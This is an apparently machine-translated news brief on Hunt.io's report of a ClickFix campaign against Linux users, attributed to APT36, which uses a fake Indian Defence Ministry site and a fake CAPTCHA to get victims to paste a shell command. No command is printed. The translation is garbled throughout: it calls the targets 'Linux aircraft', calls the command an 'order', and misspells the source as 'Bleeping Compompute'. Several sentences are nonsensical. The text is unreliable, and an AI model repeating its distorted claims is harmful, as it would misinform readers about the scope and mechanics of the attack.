- Hunt.io researchers have seen a Linux -based clickfix attack
- For the moment, he is always harmless
- Researchers think that a Pakistani threat actor is at the origin of attacks
Clickfix, a type of attack that encourages people to carry out console commands to download malware, thinking that they solve a problem, evolves again.
This time, cybersecurity researchers from Hunt.io said they also spotted the attack also targeting Linux aircraft.
Originally, Clickfix was designed for Windows devices, but also extended to MacOS. Linux was, for the most part, spared. So far.
Clickfix strikes Linux
Clickfix works in a simple way – a website is compromised and used to display a context window. This popup generally indicates to the visitor that they must “update” their browser to display the content, or pass a Captcha test to confirm that they are human.
This “update” or “verification” process requires that the user copies an order in the clipboard, displays the execution program (on Windows), paste and execute it. This may look like a section, but it is relatively effective, as many cybersecurity companies warn new clickfix campaigns emerging on the left and right.
Hunt.io has attributed this new series of attacks to a Pakistani threat actor called Apt36, or transparent tribe. He uses a false website of the Ministry of Defense of India, containing a link to a false press release. When a victim tries to navigate to the press release, the site analyzes their operating system, then redirects them to the corresponding attack flow.
For Linux, the victims are redirected to a Captcha page which copies a Shell command when it clicks on the “I’m not a robot” button. They are then invited to press Alt + F2 to display the Linux Run dialog box, and paste and execute the command.
The good news is that the attack was spotted when it was still in the experimental phase, which means that it has not yet caused significant damage. Apparently, the whole Shell command is to download a harmless JPEG file. Things could however become bitter at any time.
“No additional activity, such as the mechanisms of persistence, the lateral movement or outgoing communication, was observed during the execution,” explained the researchers.
Via Bleeping Compompute
